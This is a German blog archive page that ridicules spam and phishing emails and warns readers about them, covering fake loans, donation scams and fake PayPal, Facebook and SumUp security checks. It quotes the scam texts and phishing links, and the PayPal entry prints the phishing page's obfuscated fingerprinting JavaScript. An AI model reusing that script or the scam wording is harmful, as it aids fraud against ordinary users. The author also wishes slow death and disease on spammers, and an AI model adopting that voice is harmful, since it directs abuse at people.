Schlagwortarchiv „Hallo“

RIZA KOSAR

Montag, 19. Januar 2026

So nannte sich der Spammer, der heute um 11:13 Uhr den folgenden Kommentar zur Einleitung eines Vorschussbetruges auf Unser täglich Spam veröffentlichen wollte, und der sich sogar ganz besonders extraschlau vorkam, weil er kein Spamskript benutzt hat, sondern den Text eigenhändisch ins Kommentarfeld kopiert hat. Der Text ist vermutlich teilweise mithilfe eines angelernten neuronalen Netzwerkes formuliert worden und hat von daher eine enorme Weitschafeligkeit und Faselfreude – aber bei der überhasteten Überarbeitung haben sich ein paar leidige Fehlerchen und Dada-Formulierungen dazugesellt:

Hello Sir & Madam,
Welcome to your RIZA KOSAR broker, Are you an entrepreneur of a company, a real estate developer, or a large industrial construction company, or a head of commercial companies or a construction contractor during the COVID-19 crisis pandemic, but who have failed, either due to the increase in the cost of materials, a shortage of labor, or a chief accountant of a company in financial crisis whose funds you need from a creditor lender broker as registry number (8658873). Today, these unfinished projects are competing for financing, with ambitious requests for loans for new construction from established developers.? Do you need investment funds to start your own business or finance your project? I am an independent Swiss broker on behalf of Riza Kosar of German and Swiss nationality who finances different types of funds and investments in several sectors in collaboration with HSBC BANK Germany and several other banks in areas such as:

Development: From residential to commercial, we can help you bring your vision to life.
* **Acquisition: Need financing to secure a valuable asset? We can provide the necessary capital.
* **Financing:** get the funds you need for your ongoing operations and expansion.
* **Equity Investment: Partner with us to fuel your growth and unlock new opportunities.
* **Hotels and multi-family buildings:** We have experience in investing in profitable real estate projects.
* **Infrastructure:** Contribute to the development of essential infrastructure projects.
* **Business Financing: Access the capital your business needs to thrive and innovate.
*accessible financing for urban projects and innovative solutions for and with farmers, foresters and rural communities.
* **Energy:** Invest in sustainable energy solutions and in the automotive industry sector.
.are you looking for an investment loan and financing for your photovoltaic and wind projects.
* **Investment in your technological research projects.

* **Other viable projects:** we are open to exploring new opportunities.We offer you money financing from € 10,000 ($ ,CHF,£) to € 80 billion ($,CHF,£) at an interest rate of 2% for all people able to repay it
Contact us:RizaFund-investment@outlook.com

Ich bin zwar nicht der Oberbuchhalter eines in der Finanzkrise gescheiterten Unternehmens, nehme aber trotzdem gern die achtzig Milliarden Dollar, Fränkli oder Pfund! Ist zwar ein bisschen schade, dass bei der HSBC-Bank Germany gerade keine Euro mehr im Angebot sind, aber damit komme ich schon klar. Endlich kann ich mal wieder so richtig durchkaufen! 🛒️

Die Darlehen der Outlook.com-Banken mit ihren anonym und kostenlos eingerichteten Mailadressen und ihrer Kommentarspam in irgendwelchen Foren und Blogs sind immer die allerbesten! Aber immerhin: Zur Abwechslung ist es mal keine GMail-Bank. Vermutlich bin ich nicht der einzige Mensch auf der Welt, der eine GMail-Adresse als starken Hinweis auf Spam betrachtet.

Natürlich gibt es da kein Darlehen. Da darf man nur Vorleistungen aller Art bezahlen und bekommt gar nichts dafür. Bitte keine Überweisungen und keine Schecks, bitte nach Möglichkeit alles über Western Union und Konsorten oder mit Kryptogeld bezahlen! Diese „Darlehensgeber“ bleiben lieber so anonym wie möglich.

🔥 Sponsored post on http://tamagothi.de

Mittwoch, 14. Januar 2026

Abt.: Sachen, die auch immer wiederkommen 💩️

Oh, schön: Mit einem Emoji im Betreff. Das reicht bei mir schon fürs Aussortieren als Spam, denn ich kenne keine denkenden und fühlenden Menschen, die sich auf diese Weise in meine Aufmerksamkeit drängeln wollen. Das machen bei mir nur Werber und Spammer, also Geschmeiß, dessen Gefasel manipulative Lüge ist.

Von: Helen Mazetska <sales@prposting.com>

Ich kenne das Absendery nicht. Und eine Mailadresse in einer Domain, die irgendwas von „PR“ faselt, also von professionell verbreiteten Lügen, senkt meine Sympathie sofort auf den Nullpunkt.

Hallo!

So genau hat aber schon lange keiner mehr meinen Namen gekannt. In der gleich als Grund und Thema für diese Spam benannten Website steht mein Name in großen, freundlichen und ziemlich unübersehbaren Buchstaben auf jeder einzelnen Seite. Er ist Titel der Website. Natürlich gibt es auch ein Impressum.

Ich möchte einen gesponserten Artikel mit 1-2 Dofollow-Links auf Ihrer Website veröffentlichen http://tamagothi.de

Geht das? Zum welchen Preis?

Beste Grüße, Helen Mazetska

Hallo Helen, die du wenigstens den eigenen Namen kennst,

nein, das geht überhaupt nicht. Ich schreibe für Leser, nicht für Geld und ganz sicher nicht für die Vermarktung von Werbeplätzen, auf denen meine Leser belogen werden. Sonst würde ich auch sehr anders schreiben, und es machte mir nicht so viel Spaß. Wenn du einfach und preiswert deine Texte im Internet veröffentlichen willst, dann benutz mal eine dieser neumodischen Suchmaschinen, um gute Angebote zu finden! Das geht schon für unter einen Euro im Monat. Aber wenn du das von der Steuer absetzen kannst, musst du gar nicht so einen Billigheimer nehmen. Ach, du zahlst gar keine Steuern, weil du kriminell bist? Da darfst du dann gern unter eigenem Namen und in eigener Verantwortung deine schnell aufgeblasene, vermutlich mit angelernten neuronalen Netzwerken mühelos als wortreich-schaumiger Gnobbelmatsch erzeugte, ungekennzeichnete Reklame hinmachen und fröhlich deine Links auf Abzockcasinos, Quacksalbereien, Reichwerdexperten, Datingbetrüger, Pimmelpillenverkäufer oder Pornografievermarkter hinlegen. Oder warum verheimlichst du, wo diese voll wichtigen Links ohne „Entwertung für Google“ hinführen sollen? Das wäre im Lande der Linkhaftung ja eine gar nicht so eine unwichtige Information. Es gibt keinen anständigen Grund, dass ich das Hosting deiner Mülltexte übernehmen und dafür mehr Geld als kommerzielle Anbieter bekommen sollte. Es kann dafür nur Gründe geben, die äußerst unanständig sind. Oder offen kriminell.

Wenn du auf der Website, auf der du so unbedingt deinen geistigen Sondermüll verklappen willst, dass du mir sogar eine Mail in den Glibbereimer des Spamfilters machst, auch mal gelesen hättest, dann hättest du mich gar nicht erst angemailt.

Aber dir ist ja alles egal. Deshalb spammst du ja auch. Und am liebsten würdest du mich auch noch zum Spammer machen, der die Intelligenz seiner wenigen Leser mit ungekennzeichneter (und illegaler) Schleichwerbung offen verachtet.

Geh sterben! Aber langsam und qualvoll!

Dein dich „genießender“
Nachtwaechter

PS: Das für gewerbliche E-Mail im Rechtsraum der Bundesrepublik Deutschland obligatorische E-Mail-Impressum hast du natürlich auch „vergessen“. Damit man auch dann weiß, woran man ist, wenn man es an der illegalen und asozialen Spam noch nicht gemerkt hat.

We received a request to verify your identity for your account

Freitag, 2. Januar 2026

Abt.: Schlechtes Phishing

Wer seid ihr überhaupt?

Von: Facebook Support <support@vietnammedical.org>

Ach, das spammige, kriminelle und für seine kriminelle Spam vom BGH verurteilte Fratzenbuch, das keinen eigenen Server hat, schreibt mir? Da habe ich aber gar keinen Account. So weit kommt es noch, dass ich einen Account bei dermaßen asozialen Spammern habe! Und die haben mir damals so unfassbar viel Spam an meine mit Handytrojanern eingesammelte Mailadresse ins Postfach gemacht, immer schön mit gefälschtem Absender, um mich breitzuschlagen, immer klar aus dem IP-Bereich vom Fratzenbuch kommend. Möge sich der Pleitegeier sein fettes Fresschen holen! Möge man schmerzhafte, entstellende und unheilbare Krankheiten nach Mark Zuckerberg benennen! Was für ein widerliches Geschmeiß, das sich seine Geschäftsmethoden von Kriminellen abschaut! 🤮️

Aber davon einmal abgesehen, dass ich von nichts anderem so deutlich wie vom Fratzenbuch (und damit auch von Finster-Gram und WanzApp) abraten würde: Es reicht, auf den Absender zu schauen, um ganz sicher zu wissen, dass diese Mail nicht von Facebook kommt.

Die Mail ist in englischer Sprache und nicht in der Sprache, die die meisten Leser hier wohl für Facebook eingestellt haben. Und der Absender…

Hello,

…weiß nicht einmal, wie der Empfänger heißt. Trotz behaupteten Benutzerkontos. Trotz einer Datenbank voller von überall eingesammelter Daten. Damals, als es noch zwei bis drei Spams pro Woche vom Fratzenbuch gab, wusste das Fratzenbuch über die mit seinem Trojaner nach Hause gefunkten Handy-Adressbücher sogar, wer mich alles alles so kannte.

Recently, we received a request to verify a copy of an ID for your account. This is part of our process when we ask you to send a copy of an ID with your name on it to assist in verifying your identity.

So so, ihr habt da also ein Ersuchen bekommen, euch mal ein Ausweisdokument von mir anzuschauen. Von wem denn? Ist es die NSA, der Mossad oder die Mafia?

What you can do

If you sent this request, you don’t need to do anything further.

Ach, das kann ich sogar selbst gewesen sein? „Hey, Fratzenbuch, guck doch mal, ob ich noch ganz echt bin, ich bin mir gerade nicht sicher!“ Lustig. Ob Spammer wohl ihre eigenen Texte lesen. Oder ob sie einfach den Gnobbelmatsch von einem angelernten neuronalen Netzwerk erzeugen lassen und ungelesen absenden?

If you don’t recognize this request, please log in to https://auth.vietnammedical.org/login and complete the 2-factor authentication process when prompted. Please do not send additional requests for ID verification.

Wenn ich überhaupt keine Ahnung mehr habe, was dieser vor sich hin gärende Bullshit bedeuten soll, dann soll ich klicki-klicki in die Spam machen. Auf einen Link, der nicht einmal versucht, so zu tun, als führe er beim Klicken zum Fratzenbuch.

Thank you for your understanding!

Vielen Dank für den pseudohöflichen Dank für nichts! Vor meinem Arsch ist auch kein Gitter. Jeder, der mir mit solchen Phrasen kommt, darf mal. 🖕️

The Facebook Team

Wenn ihr das Fratzenbuch seid, dann bin ich Papst.

This message was sent to at your request.

Wohin wurde die Nachricht denn versendet. Ach, zu „zu“. Nicht einmal das benutzte Spamskript verstehen diese Phisher.

Meta Platforms, Inc., Attention: Community Support, 1 Meta Way, Menlo Park, CA 94025

Oh, vom „Achtung, Gemeinschafts-Support“. 😅️

Unsubscribe

Wer in so eine Spam klickt, lasse alle Hoffnung fahren. Jeder Link funkt über einen URI-Parameter zurück, an welche Mailadresse die Spam gegangen ist. Wenn man reinklickt, sagt man damit Spammern, dass die Spam angekommen ist, geöffnet wurde, gelesen wurde und beklickt wurde, und das sogar, obwohl sie dumm und stümperhaft gemacht und formuliert wurde. Der Klick wird also Folgen haben. Mindestens dreißig am Tag. Eine dümmer und schlimmer als die andere.

Niemals in so eine E-Mail klicken! Stattdessen die Website über ein Lesezeichen im Browser aufrufen, sich wie gewohnt anmelden und schauen, ob das behauptete Problem überhaupt besteht. Und wenn man sich schon bei Fratzenbuch, WanzApp oder Finster-Gram angemeldet hat, ist das eine gute Gelegenheit, mal eben schnell das Benutzerkonto zu löschen. Oder hat jemand Lust auf Unternehmen, die sich ihre Methoden (Spamwerbung mit gefälschtem Absender, Trojaner auf persönlich genutzten Computern) von der organisierten Kriminalität abgeschaut haben, um ihr Geschäft zum Laufen zu bringen? Wenn ja: Viel Spaß! Und demnächst ein bisschen mehr Glück beim Denken! Es ist nötig. 🍀️

Re: Hallo

Donnerstag, 18. Dezember 2025

Von: Gina Rinehart <angela@artnaweb.com.br>
An: Recipients <angela@artnaweb.com.br>
Antwort an: ginarinehart9619@gmail.com

Ich stehe natürlich nicht als Empfänger drin, weil die Mail gleichlautend an hunderttausende Mailadressen geht, und ich soll natürlich auch nicht an die Absenderadresse antworten, sondern an eine anonym und kostenlos eingerichtete Mailadresse beim dicksten Kumpel und Komplizen des Spammers und Betrügers, bei Googles GMail.

Hallo
Ich bin Gina Rinehart, eine australische Geschäftsfrau, Investorin und Vorstandsvorsitzende von Hancock Prospecting, einem in Privatbesitz befindlichen Mineralexplorations- und -gewinnungsunternehmen. Ich bin einer der Eigentümer von Hancock Prospecting. Ich habe 25 Prozent meines persönlichen Vermögens für wohltätige Zwecke gespendet. Und ich habe auch versprochen, die restlichen 25% in diesem Jahr 2025 an Individual [sic!] zu verschenken. Ich habe mich entschlossen, Ihnen 2.000.000,00 Euro zu spenden. Wenn Sie an meiner Spende interessiert sind, kontaktieren Sie mich für weitere Informationen.

Sie können auch mehr über mich über den unten stehenden Link lesen

https://en.wikipedia.org/wiki/Gina_Rinehart

Gina Rinehart – Wikipedia
en.wikipedia.org

Herzliche Grüße,
Frau Gina Rinehart,
Vorstandsvorsitzende von Hancock Prospecting.
E-Mail: ginarinehart9619@gmail.com

Hey, Gina, du Spammchen,

als du mir das letzte Mal einen verblüffend ähnlichen Text über grundlos verschenkte Millionenbetrüge in den Pesteingang gemacht hast, da warst du noch Maria-Elisabeth, das kleine Spammchen aus dem dicken Geldsack. Das ist bei dir ja beinahe wie mit Raider und Twix. 😁️

Ein bisschen Mühe kannst du dir aber ruhig mal geben! Ach, wenn du dir Mühe geben wolltest, brauchtest du ja gar nicht zu spammen und zu betrügen, sondern könntest gleich arbeiten gehen? Genau so habe ich dich auch gleich eingeschätzt.

Ich wünsche dir eine ruhmvolle Zukunft und weltweite Bekanntheit! Möge man eine unheilbare Krankheit nach dir benennen!

Dein dich und deinen Vorschussbetrug „genießender“
Nachtwaechter

Entf! 🗑️

Ihr Geld steht zur Auszahlung bereit

Donnerstag, 18. Dezember 2025

Von: Marc Schulte <zulegers@live.com>

Kenne ich nicht.

An: Emilie <vouaneuz@hotmail.com>

Bin ich nicht. Unter den vielen Freemail-Adressen, die ich schon aus reiner Selbstachtung vermeiden würde, stehen die von Microsoft übrigens sehr weit oben. Nur GMail ist noch schlimmer. Da sieht man ja gleich wie ein Spammer aus.

Hallo,

Ist nicht mein Name.

Es steht noch eine Zahlung aus die bisher noch nicht gesendet wurde.

Bitte teilen Sie uns mit wie wir Ihnen die Zahlung senden sollen.

Sie können die Zahlungsmethode hier auswählen:

Wofür soll ich denn irgendwelches Geld bekommen? Dafür, dass bald schon wieder Weihnachten ist? 🧑‍🎄️

Die Mitteilung erfolgte bereits einmal zuvor, bisher ging allerdings noch keine Antwort ein.

Kein Wunder, wenn da gar nicht meine Mailadresse als Empfänger drin steht. So etwas gibt es nur in Spam, und deshalb wird so etwas automatisch aussortiert und in eine glibberig-eklige Tonne geschmissen, in die denkende und fühlende Wesen wirklich ungern schauen.

Bitte hier auswählen:

Ah, Zielgruppe sind Menschen, die nicht verstehen, dass man mit diesem lustigen Rollbalken am Fenster auch zurückscrollen könnte. Wäre aber auch schade, wenn man solche Menschen vom Betrug ausschließt, einfach nur, weil sie etwas unbeholfen am Computer sind! Dabei sind die doch sonst immer so gläubig und naiv…

Mit freundlichen Grüssen

Kundenservice

Wessen Kundenservice bitte? Der von Hotmail, oder der von live.com?

Wenn Sie von uns nicht erneut kontaktiert werden wollen klicken Sie bitte hier

Genau, das hilft ganz sicher, wenn man Spammern sagt, dass ihre Spam ankommt. Worum geht es überhaupt in der kryptischen Spam?

$ lynx -dump https://kgpgaqqmgbonnl.wwvpsa.top/ | sed -n 1,20p
   KOSTENLOSE KOPIEN VERFÜGBAR
   Bitcoin System
   Lukas F. gerade gemacht
   €3370

Reiten Sie auf der Bitcoin-Welle und verdienen Sie mit künstlicher
Intelligenz garantierte €13000 in genau 24 Stunden.

   IFRAME: [1]https://player.vimeo.com/video/820296219?h=d550fb7e34

   Kostenlos registrieren und €1000 sichern
   Cash LIVE – gleich jetzt
   [2]Gehe zur Einzahlungsseite!

Dem Bitcoin-System beitreten

   Bitcoin
   Das Bitcoin-System ist eine Gruppe, die ausschließlich Menschen
   vorbehalten ist, die auf die wahnsinnigen Renditen von Bitcoin
   aufmerksam gemacht wurden und dabei leise ein Vermögen gesammelt haben.
$ _

Ah, ich verstehe: Heute kann man sich mal wieder das Geld aus der Steckdose ziehen. Mit so genannter „Künstlicher Intelligenz“, mit Kryptogeld und mit tollem Video. So schade, dass Vimeo mir und anderen das Archivieren solcher Videos inzwischen sehr schwer macht. Aber irgendjemand muss ja auch den ganzen Reichwerdspammern helfen. In diesem Fall macht es nichts. Das Video kam mir sofort sehr bekannt vor. Ich hatte es vor rd. fünf Jahren schon einmal archiviert, damit diese Popelperle der Betrügerkunst nicht verloren gehe. Der überlagerte Schriftzug „SPAM“ ist natürlich von mir. Die stellenweise sehr bescheidene Videoqualität ist aus dem Original. Die Änderungen im Video sind marginal. Oder wie ich es immer so schön schreibe: Wenn Spammer sich Mühe geben wollten, könnten sie ja gleich arbeiten gehen.

pardqogfohtlrogeyalpzaellfuzpmbyzuvljpsoqolsebssv

Ibe zrvarz Nefpu vfg nhpu xrva Tvggre!

💧Die lebensverändernde Wasserflasche mit zusätzlichen Vorteilen für Sie

Montag, 15. Dezember 2025

Mal wieder eine Portion Gnobbelmatsch aus dem angelernten neuronalen Netzwerk, frisch im Spameingang – achtung, es wird sehr dumm:

Sind Sie auf der Suche nach mehr als nur Flüssigkeitszufuhr? 💧✨

Hallo👋

LifeWater ist nicht einfach nur eine weitere Wasserflasche – es ist ein Schritt in Richtung eines gesünderen Lebens 🌱. Jede Flasche LifeWater ist mit wichtigen Mineralien angereichert und so konzipiert, dass sie nicht nur Ihren Durst löscht 💦, sondern auch das allgemeine Wohlbefinden Ihres Körpers fördert 💪😊.

Jetzt Hydratisieren

Warum LifeWater?

🌊 Reinheit, die Sie schmecken können: Jeder Tropfen LifeWater wird einem strengen Filtrationsprozess unterzogen, um sicherzustellen, dass Sie nur das Beste trinken.

💪 Mit Mineralien angereichert: Angereichert mit Magnesium, Kalium und Kalzium für Ihre tägliche Gesundheit.

🔋 pH-ausgeglichen: Perfekt ausgewogen, um den natürlichen pH-Wert Ihres Körpers zu ergänzen.

Erfahrungsbericht eines Kunden: „Ich wusste nicht, dass Wasser einen solchen Unterschied in Bezug auf mein Energieniveau und meine allgemeine Gesundheit machen kann, bis ich LifeWater ausprobierte. Es ist definitiv mehr als nur Wasser!“ – Emily R., Geprüfte Käuferin

Entdecken Sie LifeWater noch heute

Verpassen Sie nicht die Gelegenheit, Ihre Trinkgewohnheiten zu ändern. Klicken Sie auf die Schaltfläche oben und beginnen Sie noch heute, die Vorteile zu spüren!

Wenn Sie Fragen haben oder weitere Informationen wünschen, können Sie uns gerne auf unserer Kontaktseite kontaktieren.

Prost auf Ihre Gesundheit,
LifeWater-Team

100 Church Street, 8th Floor, New York, New York 10007, US

Ohne weitere Worte. 🤣️

Security Verification Required-PayPal

Samstag, 13. Dezember 2025

Dieser Müll kommt natürlich nicht von PayPal. Sonst würde ich ihn ja auch gar nicht hier erwähnen. Die Spam wurde über ein kostenloses und relativ anonym zu betreibendes Angebot von Google, dem dicksten Kumpel und Komplizen des Spammers und Betrügers, versendet. Das macht PayPal nicht, obwohl auch PayPal manchmal ganz schön dumme Entscheidungen trifft.

Final Reminder: Security Verification

Hello,

Your PayPal account requires an important security update. Phone verification is mandatory.

Complete Verification

Complete this soon to avoid account limits.

Der Link geht nicht zu Paypal, sondern in eine Domain…

$ surbl login.paypalsup.com
login.paypalsup.com	LISTED: ABUSE
$ _

…die zwar beim ganz flüchtigen Hinschauen so ähnlich aussieht, aber bereits wegen Spam und Spam und Spam auf allen Blacklists steht, und spätestens morgen kommt der Eintrag wegen Trickbetrug (Phishing) dazu. Das ist der Hauptgrund, weshalb diese Spam bei mir automatisch erkannt und aussortiert wurde. Wer in diese Spam klickt, fällt in ein schwarzes Loch aus vorsätzlich unanalyiserbar gemachtem Javascript von kriminellen Spammern – ja, die haben so einen Urknall und haben das wirklich selbst ein „Schwarzes Loch“ genannt:

$ lynx -dump https://login.paypalsup.com/


Verweise

   Sichtbare Links:

   Versteckte Links:
   2. https://login.paypalsup.com/blackhole\
$ lynx -source https://login.paypalsup.com/
<html>
  <head>
<link rel="icon" href="data:,">
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<style>
 .modal {
       position: fixed;
       z-index: 1;
       padding-top: 100px; 
       left: 0;
       top: 0;
       width: 100%; 
       height: 100%; 
       overflow: auto;
       background-color: rgba(240,240,240,0.5);
       background-size: 100px;
       animation: mymove 2s infinite;
       }
 @keyframes mymove {from {background-color: rgba(240,240,240,0.5);}to {background-color: rgba(125,125,125,0.5);}} 
</style>
  </head>
  <body>
    <a href="./blackhole\"></a>
    <input id="id_gs_step" type="hidden" name="gs_step" value="0"></input>
    <input id="id_gs_token" type="hidden" value="f0a6b4f037254614474aea3863659569"></input>
    <div class="modal"></div>
    <script>
   const _0×298ade=_0×4140;function _0×1dc5(){const _0×453117=['injfn','AES','fpw1','Pkcs7','split','899844qosVvm','indexOf','toString','function(){const\x20_0x','onload','enc','Utf8','ldscrp','location','12500CmBBGk','href','257280uJyosm','8qpIYoG','MD5','id_gs_token','_0x','fpnv','41749QCRvlL','substring','[native\x20code]','dcrfr','push','none','length','createElement','stringify','fpw2','id_gs_step','CBC','value','fpdv','parse','pathname','step','padding','1799805efTDMG','injfnlst','24AtsvyH','toLowerCase','2ATQDeS','scripts','encrypt','clear','lstfn','search','join','reverse','10LxJLHn','5161002teDATD','getElementById','fromCharCode','getOwnPropertyNames','2259207NWbCPw'];_0×1dc5=function(){return _0×453117;};return _0×1dc5();}function _0×4140(_0×19393a,_0×352ccd){const _0×1dc5d4=_0×1dc5();return _0×4140=function(_0×41400b,_0×6e80ea){_0×41400b=_0×41400b-0×1c5;let _0×99860d=_0×1dc5d4[_0×41400b];return _0×99860d;},_0×4140(_0×19393a,_0×352ccd);}(function(_0×38e550,_0×2c7d79){const _0×18192f=_0×4140,_0×1e1599=_0×38e550();while(!![]){try{const _0×271629=-parseInt(_0×18192f(0×1e1))/0×1+-parseInt(_0×18192f(0×1f7))/0×2*(parseInt(_0×18192f(0×1db))/0×3)+-parseInt(_0×18192f(0×1d0))/0×4+parseInt(_0×18192f(0×1d9))/0×5*(parseInt(_0×18192f(0×1f5))/0×6)+parseInt(_0×18192f(0×1f3))/0×7*(parseInt(_0×18192f(0×1dc))/0×8)+-parseInt(_0×18192f(0×1ca))/0×9*(parseInt(_0×18192f(0×1c5))/0xa)+parseInt(_0×18192f(0×1c6))/0xb;if(_0×271629===_0×2c7d79)break;else _0×1e1599['push'](_0×1e1599['shift']());}catch(_0×449378){_0×1e1599['push'](_0×1e1599['shift']());}}}(_0×1dc5,0×206c4),window[_0×298ade(0×1d4)]=function(){const _0×2b5393=_0×298ade;function _0×540e7e(_0×36065a){const _0×2bb80e=_0×4140;return document[_0×2bb80e(0×1c7)](_0×36065a);};const _0×52500e=String[_0×2b5393(0×1c8)];function _0×4e9aa5(_0×44623d){let _0×14c7cd=_0×52500e(0×6d,0×65,0×74,0×68,0×6f,0×64),_0×1bf05a=_0×52500e(0×50,0×4f,0×53,0×54),_0×4db945=_0×52500e(0×62,0×6f,0×64,0×79);const _0×327ca9=window[_0×52500e(0×66,0×65,0×74,0×63,0×68)],_0×268b37=_0×52500e(0×2e,0×2f,0×69,0×6e,0×64,0×65,0×78,0×2e,0×70,0×68,0×70,0×3f,0×67,0×73,0×61,0×75,0×74,0×68);return _0×327ca9(_0×268b37,{[_0×14c7cd]:_0×1bf05a,[_0×4db945]:_0×44623d});};let _0×384950=_0×540e7e(_0×2b5393(0×1eb))[_0×2b5393(0×1ed)];const _0×14917c=CryptoJS;let _0xbd05c=_0×540e7e(_0×2b5393(0×1de))[_0×2b5393(0×1ed)][_0×2b5393(0×1e2)](0×0,0×10),_0×3790eb=_0×14917c[_0×2b5393(0×1d5)][_0×2b5393(0×1d6)][_0×2b5393(0×1ef)](_0xbd05c),_0×4a6672=_0×14917c[_0×2b5393(0×1d5)]['Utf8'][_0×2b5393(0×1ef)](_0xbd05c[_0×2b5393(0×1cf)]('')[_0×2b5393(0×1fe)]()[_0×2b5393(0×1fd)]('')),_0×174230={};_0×174230['r']=Math['random'](),_0×174230[_0×2b5393(0×1f1)]=_0×384950,_0×174230[_0×2b5393(0×1fb)]=_0×2b5393(0×1e6),_0×174230[_0×2b5393(0×1cb)]=0×0,_0×174230[_0×2b5393(0×1f4)]=[];function _0xd626f5(){const _0×488359=_0×2b5393;let _0×42f78a=![];for(let _0xd7b27a in window){if(typeof window[_0xd7b27a]==='function'){if(_0xd7b27a[_0×488359(0×1d1)](_0×488359(0×1df))===0×0)_0×42f78a=!![];if(!_0×42f78a)_0×174230[_0×488359(0×1fb)]=_0xd7b27a;let _0×3319d3=window[_0xd7b27a][_0×488359(0×1d2)]()[_0×488359(0×1f6)]();_0×3319d3['indexOf'](_0×488359(0×1e3))===-0×1&&!(_0×3319d3[_0×488359(0×1d1)](_0×488359(0×1d3))===0×0)&&!(_0xd7b27a[_0×488359(0×1d1)](_0×488359(0×1df))===0×0)&&(_0×174230['injfn']++,_0×174230[_0×488359(0×1f4)][_0×488359(0×1e5)](_0xd7b27a));}}}_0xd626f5();function _0×34b50e(){const _0×490a1e=_0×2b5393;let _0×28607e=[];for(let _0×230243 in window){_0×28607e[_0×490a1e(0×1e5)](_0×230243);}_0×174230[_0×490a1e(0×1cd)]=_0×14917c['MD5'](JSON[_0×490a1e(0×1e9)](_0×28607e))['toString'](),_0×28607e=[],_0×28607e=Object[_0×490a1e(0×1c9)](window),_0×174230[_0×490a1e(0×1ea)]=_0×14917c[_0×490a1e(0×1dd)](JSON[_0×490a1e(0×1e9)](_0×28607e))['toString'](),_0×28607e=[];for(let _0×5d077f in navigator){_0×28607e['push'](_0×5d077f);}_0×174230[_0×490a1e(0×1e0)]=_0×14917c[_0×490a1e(0×1dd)](JSON[_0×490a1e(0×1e9)](_0×28607e))['toString'](),_0×28607e=[];let _0×43c74d=document[_0×490a1e(0×1e8)]('div');for(let _0×38aa79 in _0×43c74d){_0×28607e[_0×490a1e(0×1e5)](_0×38aa79);}let _0×44baea=getComputedStyle(_0×43c74d);for(let _0×23a84f in _0×44baea){_0×28607e[_0×490a1e(0×1e5)](_0×23a84f);}_0×174230[_0×490a1e(0×1ee)]=_0×14917c['MD5'](JSON['stringify'](_0×28607e))[_0×490a1e(0×1d2)]();}_0×34b50e();function _0×154a09(){const _0×29e845=_0×2b5393;let _0×173029=document[_0×29e845(0×1f8)][_0×29e845(0×1e7)]-0×2;_0×174230[_0×29e845(0×1d7)]=_0×173029;}_0×154a09(),_0×174230['dcrfr']='';if(document['referrer']!=='')_0×174230[_0×2b5393(0×1e4)]=document['referrer'];async function _0×433466(){const _0×1995cb=_0×2b5393;if(typeof console[_0×1995cb(0×1fa)]==='function')console[_0×1995cb(0×1fa)]();let _0×1636dc=JSON[_0×1995cb(0×1e9)](_0×174230);const _0×5a5970='iv',_0×5e8e92=_0×52500e(0×6d,0×6f,0×64,0×65),_0×16a1b9=_0×1995cb(0×1f2),_0×2075d5=_0×14917c['mode'][_0×1995cb(0×1ec)],_0×54afd4=_0×14917c['pad'][_0×1995cb(0×1ce)],_0×57d201=_0×3790eb,_0×446b47=_0×4a6672,_0×5a3565={};_0×5a3565[_0×5a5970]=_0×446b47,_0×5a3565[_0×5e8e92]=_0×2075d5,_0×5a3565[_0×16a1b9]=_0×54afd4;let _0×14c534=_0×14917c[_0×1995cb(0×1cc)][_0×1995cb(0×1f9)](_0×1636dc,_0×57d201,_0×5a3565),_0×15f516=_0×14c534['toString'](),_0×464231=await _0×4e9aa5(_0×15f516);if(!_0×464231['ok'])return;actualLink=window[_0×1995cb(0×1d8)]['origin']+window['location'][_0×1995cb(0×1f0)]+window[_0×1995cb(0×1d8)][_0×1995cb(0×1fc)],window['location'][_0×1995cb(0×1da)]=actualLink;}_0×433466();});
    </script>
  </body>
  </html>
$ _

Niemand, der nichts zu verbergen hat, würde so coden wie in dieser einen langen Zeile Javascript. Wehe denen, die keinen wirksamen Skriptblocker verwenden! ☹️

Ich wäre nicht überrascht, wenn es einen „kostenlosen Sicherheitscheck“ des Browsers und des Betriebssystems durch kriminelle Spammer gibt und man einen Computer anderer Leute auf dem Schreibtisch hat, wenn dabei eine ausbeutbare Schwachstelle gefunden wird. Selbst, wenn es nicht so weit kommt: Alles, was man auf dieser Website eingibt, geht direkt an Kriminelle, und es dürfte so gut wie sicher sein, dass die hinterher ein weiteres PayPal-Konto zum Leerräumen und für Betrugsgeschäfte haben.

Zum Glück für uns alle gibt es ein ganz einfaches und sehr wirksames Mittel gegen Phishing, die immer noch häufigste Form des Trickbetrugs im Internet: Niemals in eine E-Mail klicken! Stattdessen für häufiger besuchte Websites, bei denen man ein Benutzerkonto hat, ein Lesezeichen im Webbrowser anlegen und diese Websites nur über dieses Lesezeichen aufrufen! Wenn man so eine „komische Mail“ wie diese erhalten hat und sich unsicher ist, ob sie vielleicht doch echt sein könnte (PayPal schreibt aber schon wie gesetzlch vorgeschrieben ein Impressum unter seine E-Mails, aber das können Phisher auch einfach kopieren und einfügen): Nicht in die Mail klicken! Die PayPal-Site über das Lesezeichen aufrufen und sich dort wie gewohnt anmelden! Wenn man nach der Anmeldung keinen Hinweis auf das angebliche Problem sieht, hat man einen dieser gefürchteten „Cyberangriffe“ abgewehrt – und sich eine Menge Geld und monate- bis jahrelangen zähen Ärger wegen der Betrugsgeschäfte über dieses Konto erspart. So einfach geht das. Und ohne Komfortverlust, denn man klickt ja weiterhin, nur eben nicht mehr auf Links, die einem irgendwelche Ganoven aus dem Internet unterschieben können. Und es kostet nichts. Macht das! 🛡️

Bitte verifizieren Sie jetzt Ihr SumUp Konto

Montag, 8. Dezember 2025

Phishing auf SumUp-Kunden sehe ich auch immer häufiger. Ich will es mal so sagen: Mit Bargeld wärt ihr sicherer.

Diese Mail ist natürlich eine Spam. Sie kommt nicht von SumUp. Mein rspamd gibt diesem Betrugsversuch aus der Hirnhölle des Posteinganges 28,77 gülden gleißende Spampunkte. Schon für fünf Punkte gehts bei mir ins Tönnchen, in dem man nicht mehr so gern schnuppert. Die Mail wurde über die Cloud von Google versendet. Es ist ein Trickbetrug (Phishing). Auf gar keinen Fall darauf reinfallen! Nicht in die Mail klicken! Denn sonst gibts einen großen „SumDown“ und man sitzt auf seinem Schaden. 😐️

SumUp Logo

So sieht es zumindest bei mir aus, denn ich lade keine Bilder in einer E-Mail. Das Logo wird auch nicht von der SumUp-Website nachgeladen, wie ein kurzer Blick in den Quelltext belegt.

<div class="logo"><img alt="SumUp Logo" src="https://logodownload.org/wp-content/uploads/2019/08/sumup-logo-0.png" width="160" /></div>

